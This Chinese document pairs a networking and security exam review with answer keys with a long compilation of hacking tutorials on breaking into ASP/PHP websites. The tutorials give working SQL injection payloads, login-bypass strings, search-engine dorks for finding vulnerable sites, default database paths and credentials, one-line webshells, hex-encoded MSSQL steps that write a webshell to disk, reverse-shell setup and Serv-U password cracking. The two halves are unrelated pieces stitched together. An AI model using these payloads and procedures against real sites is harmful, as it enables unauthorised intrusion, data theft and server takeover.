(16)在应用层协议中, b 既可使用传输层的TCP协议,又可用UDP协议。 A.SNMP B.DNS C.HTTP D.FTP (17)在OSI参考模型中,同一结点内相邻层之间通过 a 来进行通信。 A.接口 B.进程 C.协议 D.应用程序 (18)OSI参考模型的数据链路层的功能包括 a 。 A.保证数据帧传输的正确顺序、无差错和完整性 B.提供用户与传输网络之间的接口 C.控制报文通过网络的路由选择 D.处理信号通过物理介质的传输

(19)100Mbps快速以太网与10Mbps传统以太网的帧结构 c 。 A.完全不同 B.帧头控制字节不同

C.完全相同 D.可以相同也可以不同 (20) c 的物理层标准要求使用非屏蔽双绞线。

8

加油!-----老菜鸟队

A.10 BASE-2 B.10 BASE-5 C.100BASE-TX D.100 BASE-FX

(21)当一个以太网中的一台源主机要发送数据给位于另一个网络中的一台目的主机时,以太帧头部的目的地址是 b ,IP包头部的目的地址必须是 d 。 A.路由器的IP地址 B.路由器的MAC地址 C.目的主机的MAC地址 D.目的主机的IP地址

(22)当一个发往目的主机的IP包经过多个路由器转发时,以下哪种情况正确地描述了包内IP地址的变化? d 。

A. 当IP包在每跳段中传输时,目的地址改为下个路由器的IP地址。 B. 当一个路由器将IP包发送到广域网WAN时,目的IP地址经常变化。 C. 目的IP地址将永远是第一个路由器的IP地址。 D. 目的IP地址固定不变。

(23)以下哪个协议被用于动态分配本地网络内的IP地址? a。 A. DHCP B. ARP C. proxy ARP D. IGRP (24)E-mail安全传输的方法称为 C(教材198页) 。

A. TLS B. SA安全关联组 C. S/MIME D. IPSec (25) b可以根据报文自身头部包含的信息来决定转发或阻止该报文。

A.代理防火墙 B. 包过滤防火墙 C. 报文摘要 D. 私钥 (26) d 协议主要用于加密机制。

A.HTTP B. FTP C. TELNET D. SSL (27)属于被动攻击的恶意网络行为是 b 。

A.缓冲区溢出 B. 网络监听 C. 端口扫描 D. IP欺骗 (28)向有限的存储空间输入超长的字符串属于 A 攻击手段。

A.缓冲区溢出 B. 运行恶意软件 C. 浏览恶意代码网页 D. 打开病毒附件 (29)IPSec需要使用一个称为 b 的信令协议来建立两台主机之间的逻辑连接。 A.AH认证头部协议 B. SA安全关联组协议 C. PGP隐私 D. TLS传输安全协议 (30)在IP互联网层提供安全的一组协议是 d 。

A.TLS B. SSH C. PGP D. IPSec

(31) a 是IP层的安全协议,它只能提供完整性和鉴别功能,不能提供信息保密。

A.AH B. PGP C. ESP D. IPSec (32)虚拟专网VPN使用 c 来保证信息传输中的保密性。

A.IPSec B. 隧道 C.(A)和(B) D. 以上都不正确 (33)在VPN中,对 a 进行加密。

A.内网数据报 B. 外网数据报 C. 内网和外网数据报 D. 内网和外网数据报都不 二、叙述回答题:

加油!-----老菜鸟队

(1)电子商务中安全电子交易SET系统的双重签名作用是什么?它是怎样实现的? 答:教材381页。在安全电子交易SET中,持卡人购物时需要向供货商发送两个信息:订货单信息OI和加密的支付卡信息PI。其中OI是发给供货商的,而加密后的PI要经过供货商转交给支付网关银行。同一交易的OI和PI是相互关联的,利用双重前面对二者的报文摘要进行签名,可以分别向供货商和银行证明OI和PI的真实性。

(2)简述X.509的作用是什么?与其他同类系统相比,它的特点是什么。

答:教材353页,X.509是一个世界统一的公钥证书协议。它的作用是:权威机构对证书持有者的公钥进行认证,对持卡人的身份进行认证。它的使用不需要实时上网验证,可以脱离网络使用。

(3)简述RSA和DES加密算法在信息的保密性、完整性和抗拒认方面的概念和特点。 答:详见337页表10.2。RSA便于确认安全性,它使用一对公开密钥和私有密钥,它的保密性取决于大素数的运算难度,与Hash报文摘要结合使用,实现对报文的完整性确认,以及防拒认,适合于对小数据量报文的加密。

而DES对通信数据是否已经被泄密的确认较困难,它的保密性取决于对称密钥的安全性,通过对报文摘要的加密实现完整性确认,在实现抗拒认方面较困难。

(4)分别用实例说明网络安全所提供的5种服务的用途:信息保密,信息的完整性确认,身份认证,防拒认,网络实体的认证识别。 答:参看教材340页。 三、网络信息数据分析题:

(1)在校园的局域网中捕获到一个以太网帧,此帧的全部数据如下图所示,请对照相关协议的数据结构图,回答以下问题:

A.此帧的用途和目的是什么?地址解析协议的ARP查询。

B.此帧的目的物理地址是 ff:ff:ff:ff:ff:ff,它属于(广播、单播)地址。

加油!-----老菜鸟队

C.它的目的IP地址是 10.0.26.1 ,它属于(广播、单播)地址。 D.此的源物理地址是 00:16:76:0e:b8:76 。

E.它的源IP地址是 10.0.26.12 ,它属于(公网、私网)IP地址。 F.此帧属于以太网帧,还是IEEE802.3帧?为什么?

答:因为类型字段0806表示ARP协议,它大于0600,所以属于以太网,版本II。 G.此帧中封装的上层协议是什么? 答:ARP协议。

H.此帧中有没有填充字段?在什么情况下需要进行填充?

答:有,填充了18字节的0,这是为了保证CSMA/CD“载波侦听/多路访问/冲突检测”协议的正确实施,即以太网的最短帧长必须大于64字节。

I.如果有一台网络计算机对此帧收到此帧后发出响应,响应中应当包含什么内容? 答:即ARP响应,其中应当包含被查询主机的MAC地址和IP地址,参看教材82页。

(2)下图是一台计算机访问一个Web网站时的数据包序列。分析图中数据简要回答以下问题:

A.客户机的IP地址是 192.168.0.103 ,它属于(公网,私网)地址。 B.Web服务器的IP地址是 202.203.208.32 ,它属于(公网,私网)地址。

C.客户机访问服务器使用的传输层协议是 TCP ,应用层协议是 HTTP ,应用层协议的版本号是 HTTP/1.1 。

D.客户机向服务器请求建立TCP连接的数据包的号数是 1 。

E.客户机向服务器发送用户名和口令进行请求登录的数据包的号数是 4 。

F.此次访问中,客户机使用的端口名称是 ccs-doftware ,服务器使用的端口名称是 http 。

G.服务器对客户机的响应报文中,代码200的含义是 请求被成功接受 。 H.在TCP的6比特的控制字段中:

[SYN]的含义是 请求建立TCP连接 。[SYN, ACK]的含义是 可以建立连接 。 [ACK]的含义是 确认 。[FIN, ACK]的含义是 同意结束 , [FIN]的含义是 结束,参看教材150页 。

I.服务器根据请求向客户机发送网页的第一个数据帧的号数是 6 。

加油!-----老菜鸟队

http://hi.http://www.wodefanwen.com//night100/blog/item/62fd6a85fd939920c65cc3ba.html 1入侵网站服务器的8种方法 1、SQL注入漏洞的入侵

这种是ASP+ACCESS的网站入侵方式,通过注入点列出数据库里面管理员的帐号和密码信息,然后猜解出网站的后台地址,然后用帐号和密码登录进去找到文件上传的地方,把ASP木马上传上去,获得一个网站的WEBSHELL。 2、ASP上传漏洞的利用

这种技术方式是利用一些网站的ASP上传功能来上传ASP木马的一种入侵方式,不少网站都限制了上传文件的类型,一般来说ASP为后缀的文件都不允许上传,但是这种限制是可以被黑客突破的,黑客可以采取COOKIE欺骗的方式来上传ASP木马,获得网站的WEBSHELL权限。 3、后台数据库备份方式获得WEBSHELL

这个主要是利用网站后台对ACCESS数据库进行数据库备份和恢复的功能,备份数据库路径等变量没有过滤导致可以把任何文件的后缀改成ASP,那么利用网站上传的功能上传一个文件名改成JPG或者GIF后缀的ASP木马,然后用这个恢复库备份和恢复的功能把这个木马恢复成ASP文件,从而达到能够获取网站WEBSHELL控制权限的目的。 4、 网站旁注入侵

这种技术是通过IP绑定域名查询的功能查出服务器上有多少网站,然后通过一些薄弱的网站实施入侵,拿到权限之后转而控制服务器的其它网站。 5、sa注入点利用的入侵技术

这种是ASP+MSSQL网站的入侵方式,找到有SA权限的SQL注入点,然后用SQL数据库的XP_CMDSHELL的存储扩展来运行系统命令建立系统级别的帐号,然后通过3389登录进去,或者在一台肉鸡上用NC开设一个监听端口,然后用VBS一句话木马下载一个NC到服务器里面,接着运行NC的反向连接命令,让服务器反向连接到远程肉鸡上,这样远程肉鸡就有了一个远程的系统管理员级别的控制权限。 6、sa弱密码的入侵技术

这种方式是用扫描器探测SQL的帐号和密码信息的方式拿到SA的密码,然后用SQLEXEC之类的工具通过1433端口连接到远程服务器上,然后开设系统帐号,通过3389登录。然后这种入侵方式还可以配合WEBSHELL来使用,一般的ASP+MSSQL网站通常会把MSSQL的连接密码写到一个配臵文件当中,这个可以用WEBSHELL来读取配臵文件里面的SA密码,然后可以上传一个SQL木马的方式来获取系统的控制权限。 7、提交一句话木马的入侵方式

这种技术方式是对一些数据库地址被改成asp文件的网站来实施入侵的。黑客通过网站的留言版,论坛系统等功能提交一句话木马到数据库里面,然后在木马客户端里面输入这个网站的数据库地址并提交,就可以把一个ASP木马写入到网站里面,获取网站的WEBSHELL权限。 8、 论坛漏洞利用入侵方式

这种技术是利用一些论坛存在的安全漏洞来上传ASP木马获得WEBSHELL权限,最典型的就是,动网6.0版本,7.0版本都存在安全漏洞,拿7.0版本来说,注册一个正常的用户,然后用抓包工具抓取用户提交一个ASP文件的COOKIE,然后用明小子之类的软件采取COOKIE欺骗的上传方式就可以上传一个ASP木马,获得网站的WEBSHELL。 2入侵网站的14种可利用方法

1.上传漏洞 upfile.asp, upload.asp,upload_flash.asp ,upfile_soft.asp,upfile_softpic.asp

加油!-----老菜鸟队

pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!

有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传。还有一些只是检测文件类型的,没有进行后缀名判断,这样的上传只需要把木马文件的开关加个GIF89a就可以通过了。而且可以上传任意文件,在asp和asp.net测试中都可以上传。 2.注入漏洞

pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:

http://注入网址;update admin set password=’新MD5密码’ where password=’旧MD5密码’-- [admin为表名.] //看看是什么权限的,如果权限高的话,直接用SQLTOOLS进行连接就可以执行系统命令了。 http://注入网址 and 1=(Select IS_MEMBER(''db_owner''))

http://注入网址 And char(124)+Cast(IS_MEMBER(''db_owner'') as varchar(1))+char(124)=1 ;-- //检测是否有读取某数据库的权限

http://注入网址 and 1= (Select HAS_DBACCESS(''master''))

http://注入网址 And char(124)+Cast(HAS_DBACCESS(''master'') as varchar(1))+char(124)=1 -- 3.旁注,也就是跨站

我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了。 4.暴库:把二级目录中间的/换成\

eg:http://www.xxx.com/myhome/otherweb ... s.asp?BigClassName=职责范围&BigClassType=1

换成这样的形式提交:http://www.xxx.com/myhome\otherweb ... s.asp?BigClassName=职责范围&BigClassType=1

如果你能看到:’E:/ahttc040901/otherweb/dz/database/iXuEr_Studio.asa’不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。 这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行. 5.绕过密码验证直接进入后台

’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:

’or’’=’ \’) or (’a’=’a \’a’=’a

6.社会工程学

这个我们都知道吧。就是猜解。猜解一些人们常用的密码,比如他的生日啊,手机号码啊。办公电话啊等等。。

EY:http://www.xxx.cn/waishi/admin admin waishi

7.写入ASP格式数据库

加油!-----老菜鸟队

就是一句话木马[〈%execute request(\〉 ],常用在留言本. EY:http://www.xxx.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库],再写入一句话木马,然后利用ASP后缀名的数据库进行写入木马。也提醒一下站长,MDB数据库改为.asp后缀也是不安全的。 8.源码利用

很多网站用的都是网上下载的源码,有的站长很懒,什么也不改。然后就上传开通网站了,像这样的网站只要知道他用的什么网站的源码做的,自己去网上下载一个,然后就有很多信息可以利用了。像数据库备份,网站后台啊,原始数据库路径啊,上传文件的路径啊等等,都可以进行利用。

EY:http://www.xxxx.edu.cn/xiaoyoulu/index.asp 这个站用的是:杰出校友录,源码我下过了,

默认数据库/webshell路径:/database/liangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin

9.默认数据库/webshell路径利用

这样的网站很多/利人别人的WEBSHELL. /Databackup/dvbbs7.MDB /bbs/Databackup/dvbbs7.MDB /bbs/Data/dvbbs7.MDB /data/dvbbs7.mdb /bbs/diy.asp /diy.asp /bbs/cmd.asp /bbs/cmd.exe /bbs/s-u.exe /bbs/servu.exe

工具:网站猎手 挖掘鸡

EY:http://www.xxx.com/bbs/Databackup/dvbbs7.MDB

10.查看目录法,有一些网站可以浏览目录,可以看到目录下所有的文件。 EY:http://www.xxx.com/shop/admin/

http://www.xxx.com/babyfox/admin/#bb#dedsed2s/ 这样我们可以找到数据库,下载不用我教吧 11.工具溢出

.asp?NewsID= /2j.asp?id=18 .asp?id=[这种方法可以取得大量的WEBSHELL] 12.搜索引擎利用

(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/ (2).找网站的管理后台地址: site:xxxx.comintext:管理

site:xxxx.comintitle:管理 〈关键字很多,自已找〉 site:xxxx.cominurl:login

(3).查找access的数据库,mssql、mysql的连接文件 allinurl:bbsdata

filetype:mdbinurl:database filetype:incconn

inurl:datafiletype:mdb

加油!-----老菜鸟队

13.COOKIE诈骗

把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。然后就直接登录有了网站后台管理员权限了。这个我就不多讲了 14.利用常见的漏洞,如动网BBS

EY:http://www.xxx.com/bbs/index.asp

可以先用:dvbbs权限提升工具,使自已成为前台管理员。

THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包

3拿到webshell权限的45种方法

1, 到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库! 2, 到Google ,site:cq.cn inurl:asp 3, 利用挖掘鸡和一个ASP木马. 文件名是login.asp 路径组是/manage/ 关键词是went.asp 用'or'='or'来登陆 4,

关键字:Co Net MIB Ver 1.0网站后台管理系统 帐号密码为 'or'='or' 5. 动感购物系统

inurl:help.asp登陆,如未注册成为会员!

upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞

6。 默认数据库地址blogdata/acblog.asa 关键字:acblog 7. 百度 /htdocs

注册里可以直接上传asa文件! 8. /Database/#newasp.mdb

关键词:NewAsp SiteManageSystem Version 9. 用挖掘机

关键字:Powered by WEBBOY 页面:/upfile.asp

10. baidu中搜索关键字Ver5.0 Build 0519 (存在上传漏洞)

11. Upfile_Article.asp bbs/upfile.asp 输入关键字:powered by mypower ,

12. inurl:winnt\\system32\\inetsrv\\ 在google里面输入这个就可以找到很多网站 13. 现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp

14. 键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛 挖掘鸡的关键字 添 setup.asp 15. VBulletin论坛的数据库

加油!-----老菜鸟队

默认数据库地址!

/includes/functions.php 工具:

1.网站猎手 下载地址:百度 Google! 2.Google 关键字:

Powered by: vBulletin Version 3.0.1 Powered by: vBulletin Version 3.0.2 Powered by: vBulletin Version 3.0.3 其中一个就可以了

16. 1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart open source。 这是一个商场系统。

2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~ 猜到,comersus.mdb. 是数据库名 数据库都是放在database/ 后的, 所以database/comersus.mdb

comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。 那样把前一个''store/''除去,再加上database/comersus.mdb 试试 17.

无忧传奇官方站点程序。

1、后台管理地址:http://您的域名/msmiradmin/ 2、默认后台管理帐号:msmir

3、默认后台管理密码:msmirmsmir

数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb 数据库连接文件为 ***********/Conn.asp 18. 百度里输入/skins/default/ 19. 利用挖掘机

关键机:power by Discuz 路径:/wish.php 配合:

Discuz!论坛 wish.php远程包含漏洞 工具使用 20. 上传漏洞. 工具 : Domain3.5 网站猎手 1.5版

关键字powered by mypower

检测的页面或文件插入upfile_photo.asp 21. 新云漏洞

这个漏洞ACCESS和SQL版通吃。

Google搜索关键字 \关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录\

把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp

以源码,软件等下载站居多。

大家时常碰到数据库如果前面或者中间+了# 可以用#替换就可以下载了

加油!-----老菜鸟队

\\database\\#newasp.mdb

如:#xzws.mdb 改成#xzws.mdb 22. 通吃所有商城+动力上传系统 使用工具:挖掘鸡 v1.1 明小子 商城入侵:

关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成 漏洞页面:upload.asp upfile_flash.asp 动力入侵:

关键字:powered by mypower 漏洞页面:upfile_photo.asp Upfile_Soft.asp upfile_adpic.asp upfile_softpic.asp 23. 注射漏洞

百度搜索:oioj's blog 24 动易 列目录

admin_articlerecyclebin.asp

inurl:admin_articlerecyclebin.asp 25. 工具:网站猎手 关键词:inurl:Went.asp 后缀:manage/login.asp 口令:'or'='or' 26. 入侵魔兽私服

需要的工具:ASP木马一只。 Domain3.5明小子

关键字:All Right Reserved Design:游戏联盟 后台地址:admin/login.asp

数据库的地址:chngame/#chngame.mdb 27. 漏洞是利用管理员iis设臵的失误 用baidu 关键字就是比较罕见的脚本名 动网: ReloadForumCache.asp Leadbbs: makealltopanc.asp BBSXP: admin_fso.asp

动易: admin_articlerecyclebin.asp 28. 国外站的爆库漏洞

关键字:sad Raven's Guestbook 密码地址:/passwd.dat 后台地址:/admin.php

29. Discuz 4.1.0跨站漏洞 利用工具:1,WAP浏览器 2,WAP编码转换器

加油!-----老菜鸟队

关键字:\30. 关键字:尚奈克斯

后台路径/system/manage.asp 直接传ASP木马 31. 工具 1:网站猎手 2:大马一个

关键字:切勿关闭Cookies功能,否则您将不能登录 插入diy.asp

32. 关键字:Team5 Studio All rights reserved 默认数据库:data/team.mdb

33. 工具: 挖掘机 辅臣数据库读取器 关键字: 企业简介 产品展示 产品列表 后缀添加: /database/myszw.mdb 后台地址: admin/Login.asp

34. 关键子 XXX inurl:Nclass.asp 在\系统设臵\里写个木马。 会被保存到 在 config.asp内。 35. 不进后台照样拿动网WEBSHELL

data.asp?action=BackupData 动网数据库备份默认路径 36. 工具:网站猎手 WebShell 关键字:inurl:Went.asp 后缀:manage/login.asp 弱口令:'or'='or'

37. 关键字:Powered by:QCDN_NEWS 随便扫遍文章加一个' ,来试探注入点 后台地址:admin_index.asp 38. 入侵雷池新闻发布系统 关键字:leichinews

去掉leichinews后面的.

打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp 再上传马.....

进访问uppic anran.asp 登陆马.

39. 关键字:Power System Of Article Management Ver 3.0 Build 20030628 默认数据库:database\\yiuwekdsodksldfslwifds.mdb 后台地址:自己扫描!

40. 一、通过GOOGLE搜索找大量注入点 关键字:asp?id=1 gov.jp/ asp?id= 页数:100

语言:想入侵哪个国家就填什么语言吧 41. 关键字:Powered by:94KKBBS 2005 利用密码找回功能 找回admin 提问:ddddd 回答:ddddd

42. 关键字:inurl:Went.asp

加油!-----老菜鸟队

后台为manage/login.asp

后台密码: 'or'=' 或者 'or''=''or' 登录 进入 默认数据库地址:Database/DataShop.mdb 43. 关键字:六合彩 inurl:readnews.asp

把最后一个/改成\ ,直接暴库,看密码,进后台 随便添加个新闻 在标题输入我们的一句话木马 44. 工具:一句话木马

BBsXp 5.0 sp1 管理员猜解器 关键词:powered by bbsxp5.00 进后台,备份一句话马!

45. 关键字:程序核心:BJXSHOP网上开店专家 后台:/admin

4注射入侵思路及流程

一. 寻找并获得具有一定权限的注射漏洞网站

二. 找出的注射漏洞网站一般分两种数据库类型(mmsql 和access),那么不同的数据库类型当然需要不同的入侵方法。 1. mmsql数据库:

一是通过注射点爆出管理员用户和密码,找出后台登录,进一步提升权限。 二是通过注射点猜解网站所在服务器上的物理路径,从而进行差异备份插入一句话木马客户端,获得webshell后进一步进行权限提升。

2.access数据库:对于这种数据库就只能是去爆管理的用户密码,或者其他用户资料,然后进行后台登录。

成功登录后台后获取webshell的方法一般是:

1.cookie欺骗上传asp后门,如果能直接上传asp马那算你运气好。 2.在无法上传asp后门的情况下,上传图片文件后进行数据库操作功能备份成asp格式。

在网络安全攻与防之间有一门很重要的学问和艺术 社会工程学 社会工程学就是使人们顺从你的意愿、满足你的欲望。

举个例子:在你发现一台有漏洞的目标服务器 却被断开网络(物理隔离)也就成了最安全的计算机,然而你却能运用这门学问说服某人(admin)把这台有漏洞的已经隔离的计算机连上网络。

利用自己的思维去揣摩别人的心理,促使其发生的非主意识的行为。运用灵活的复杂的人际关系来获许想要得到的信息。 如何很好的利用社会工程学,前提是对网络安全各方面都要有一定的了解和自己的认识。也就是个人的综合能力,在遇到一些问题后能够运用自己所掌握的知识和学问独立的去解决一些实际问题。 题外话:当然入侵一个站点需要很好的运气,说运气不如说是目标服务器的管理员大意疏忽的一些漏洞和bug被你挖掘到了,那恭喜。 下面我们切入正题:

实例中需要运用到的工具:

流行注射工具:NBSI3、啊D-SQL注射工具 明小子web综合检测工具 一.通过baidu google 简单找注射漏洞网站。

我们进入baidu或google的高级搜索选项,以baidu为例如图1

我们要搜索内容是 被baidu收录的 具有黑客关键字的网站连接地址并且含有 asp?的网

加油!-----老菜鸟队

址(URL)。

我们就可以从中寻找具有注射漏洞的网址。 例:http://www.xxx.asp.com/show.asp?id=1

判断能否进行SQL注入:我们直接在后面加单引号’如果返回出错页面或许存在注射点。如果网站管理员对sql注入有点了解把单引号过滤掉了你用单引号测试,是测不到注入点的。

那么哪种判断方法准确呢?下面就是为你介绍的经典的1=1、1=2测试法了。看例: ① http://www.xxx.asp.com/show.asp?id=1

② http://www.xxx.asp.com/show.asp?id=1 ;;and 1=1 ③ http://www.xxx.asp.com/show.asp?id=1 ;;and 1=2

看上面三个网址返回的结果:可以注入的表现: ① 正常显示

② 正常显示,内容基本与①相同

③ 返回出错页面或提示找不到记录、或显示内容为空。

不可以注入就比较容易判断了,①同样正常显示,②和③一般都会有程序定义的错误提示,或提示类型转换时出错。

可以用一些注射相关的工具自行判断注射点如图2, 推荐这种方法,但原理还需掌握。 本教程的主题及篇幅有限,其他相关的我就不多介绍了,大家去找些关于sql原理的文章或教程看看。

二. 入侵思路及过程

access数据库:对于这种数据库就只能是去爆管理的用户密码,或者其他用户资料,然后进行后台登录。

以工具为例,注射爆出管理员用户及密码(一般MD5加密)如图3, 手工破解原理我会在附带教程里打包建议大家看sql注入天书。

进入http://www.xmd5.com/ 或http://www.cmd5.com/ 对md5 密文进行爆破。当然可以尝试暴力破解。得到解密后密码如图4

找出后台地址,登录后台,获取webshell。如图5

mmsql数据库: 爆管理员密码和access数据库类似,这里就不多讲。sql注射中的DB_OWNER角色如果把sa等同于administrator的话DB_OWNER角色相当于user权限。Sa权限的话既然是administrator,那提权就不多讲。这里讲下相当于user 的DB_OWNER权限获得webshell方法。以前通常用backup,但是如果对于大站数据库庞大,成功率可想而知。后来有了差异备份,将马的代码插入到数据库中,然后备份前后数据的差异部分。这样比直接将数据库备份在体积上大大缩小了。然而数据库内的一些数据由于偶然与备份后的代码冲突而出错导致失败,成功率仍然很低。现在最有效的方法是导出日志获得webshell。 先要了解DB_OWNER权限下通过以上方法获取webshell的一些必要条件。 1. Web和数据库在同一服务器 2. 已经得到网站绝对路径

3. 你要备份到的目的目录有写的权限 4. 有backup的权限 下面实例讲解:

注射点:http://www.xxxxx.dk/off_vis_film.asp?id=154 用工具啊D检测情况如图6 接下来试试列目录的功能,如果能列目录,仔细找,只要不是数据库与web分离的,就

加油!-----老菜鸟队

能找网站目录。这是个苦力活耐心点。 alter database ZZZZ set RECOVERY FULL create table cmd (a image)

backup log ZZZZ to disk = ''c:\\Sammy'' with init

insert into cmd (a) values (''<%Execute(request(\backup log ZZZZ to disk = ''c:\\web\\ma.asp'' [这里ZZZZ表示数据库名

c:\\web\\ 表示网站绝对路径 <%Execute(request(\一句话马] 实际操作过程中,我们把字符转换下:

先执行: alter database XXXX set RECOVERY FULL ? ? ? ? ? ? ? ? //把数据库日志备份类型转换为int

第 一 步: 新建一个临时表

create table [dbo].[sh*t_tmp] ([cmd] [image])-- 第 二 步 备份数据库日志

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x633A5C53616D6D79 backup log @a to disk = @s with init,no_truncate— (0x633A5C53616D6D79 = c:\\Sammy) 第 三 步 插入一句话马 Insert into [sh*t_tmp](cmd) values(0x3C25457865637574652872657175657374282261222929253E)— (0x3C25457865637574652872657175657374282261222929253E =<%Execute(request(\第 四 步 导出日志到网站目录下 declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s= 0x63003A005C007800780078005C0032002E00610073007000 backup log @a to disk=@s with init,no_truncate—

(0x63003A005C007800780078005C0032002E00610073007000 =c:\\web\\ma.asp) 第 五 步 删除临时表。 Drop table [sh*t_tmp]—

现在已经有人写出了工具getwebshell如图7。 工具和本文章课件会在配套教程里一起打包。

备份成功后浏览该文件应该像这样出现乱码如图8。 我们用一句话木马的控制端写入一句话代码如图9。

将备份好的http://www.xxx.com/ma.asp 密码a及webshell代码 填入 点上传 成功获得weshell

5 Php脚本注射检测后的再次提权

方法一:爆破法.

最显眼的要属用户名和密码了,关键是如何破密码呢?到网上搜了一个专门破SERV-U密码的工具(Serv-UPassCrack1.0a.rar),太慢了,这要等到何年何月啊!干脆用记事本打开它的脚本crack.vbs.看看解密原理:假设原来明文密码用\表示,密文密码也就是 我们在ServUDaemon.ini中看到的密码(34位),用\表示,密文的前两位合并上明文,然后经MD5加密后正 好等于密文的后三十二位!】

即:md5(password_mingwen+left(password_miwen,2)=right (password_miwen,32)俗话说的好啊,\工欲善其事,必先利其器\在网上找了两上绝配的工具!一个是

加油!-----老菜鸟队

MD5CrackSpV2.3(速度 增强版,一个非常好用的MD5爆破工具),另一个是字典专家.BBSt,利用它我们可以生成前两位为我们指定字母的字典!!MD5CrackSpV2.3 速度奇快,我们可以指定开的线程数,我在P4,256M内存环境下做了一个测试,利用字典专家.BBSt生成一个含3亿条记录,1.2G左右的字典, 用MD5CrackSpV2.3开8线程跑,总共用了30分钟!一个线程一秒钟跑大约2万条记录,8个线程一秒钟,就是16万条记录!!照此计算一台机器 一天就能跑约138亿条记录!假如有十台P4连合作业,威力无穷啊!同时在网上看到消息说山东大学已经研究出来了破解MD5的算法!但是没有找到具体的程序,程序一旦出世,密而不密,恐怕很多网站又要遭殃了!!

方法二:程序法. 不要在一棵树上吊死,一边挂着字典爆破,一边看看还有没有别的途径,双 管齐下吗,要不闲着也是闲着(哈哈)!在c:\\Program Files\\Serv-U\\ServUDaemon.ini文件中共有十多位用户,其中有一个的用户目录:\photo\\gallery\吸引了我。立即在浏览器中打上http://www.*****.net/ a***lover/photo/gallery 出现如下提示:\,在试试它的上一级目录看看:http://www.*****.net/ a***lover/photo/真是山重水复疑无路,柳暗花明又一村啊!原来在机子里还藏着个某某网络相册.

首先注册个用户进去看看,有图片上传功能 啊,抓包看看是否存在有类似动网UPFILE的漏洞,用NC提交后失败了,上传类型还是图片文件,又是那句话:\此路不通\。利用CASI查看http: //www.*****.net/ a***lover/photo/index.php的文件内容得知:程序中文名称:文本图片管理程序 程序英文名称:NEATPIC 版本:2.0.13 BETA,老规矩先到网上下个研究研究在说。经过分析目录结构发现在:database/user.php文件用于存放用户名密码等注册信息!用CASI 打开:http://www.*****.net/ a***lover/photo/database/user.php显示无文件内容!难道是默认目录不对?!管理员把目录改了!!看配臵文件: http://www.*****.net/ a***lover/photo/inc/config.inc.php发现: // 参数设臵

//*********************************

$DataDir = \杂项数据存放目录 $CatDir = \二级分类数据存放目录 $SortDir = \分类数据文件存放目录 $PicRecordDir = \图片数据总目录 $PicDir = \图片文件存放目录 $SPicDir = \缩略图存放目录 $CommentDir = \图片评论目录 $UserDat = \用户数据文件 $Dat = \相册数据文件

果然管理员把默认的database目录改成了database678了!现在可以用CASI查看user.php的内容了如下图:

面的哪一行即ID=1的为管理员的注册信息,第一个为用户名,第二个为密码。发现该用户名与ServUDaemon.ini中的相同,密码会不会也相同呢? (很多人都有使用同一密码的习惯!!)打开DOS窗口-->登录FTP-->输入用户名和密码,成功了,终于成功了!揪出这个密码可真不容易 啊!!这时字典还在哪挂着来,要跑出这个8位纯字母的密码也要费一段时间啊!!

一、 上传PHPSHELL,控制MYSQL数据库

通过 ServUDaemon.ini文件中的Access1=D:\\s***n\\ a***lover\\photo\\gallery

加油!-----老菜鸟队

|RWAMLCDP知道该用户具有:读取(R),写入(W),追加(A)等功能,唯独缺少了\执行(E)\功能!利用PUT命令上传一个一句话的 WebShell上去.在浏览器中运行http://www.*****.net/ a***lover/photo/gallery/webshell.php?cmd=dir,出现: Warning: passthru(): Unable to fork [dir] in D:\\s***n\\a***lover\\photo\\gallery\\webshell.php on line 1

看 来外部命令不能执行,管理员一定作了相应设臵.再上传一个phpinfo.php文件 在浏览器中运行:http://www.*****.net/ a***lover/photo/gallery/phpinfo.php,这时在php.ini变量的设臵都显示出来了(当然也你可以利用CASI看 c:\\windows\\php.ini 的内容)!外部命令不能执行的原因在此: 以下是引用片段: safe_mode Off Off

safe_mode_exec_dir no value no value

safe_mode_gid Off Off

safe_mode_include_dir no value no value

接下来上传一个自己编的仅带有浏览,拷贝,重命名,删除文件和上传文件五个功能的PHPSHELL:CMD.PHP

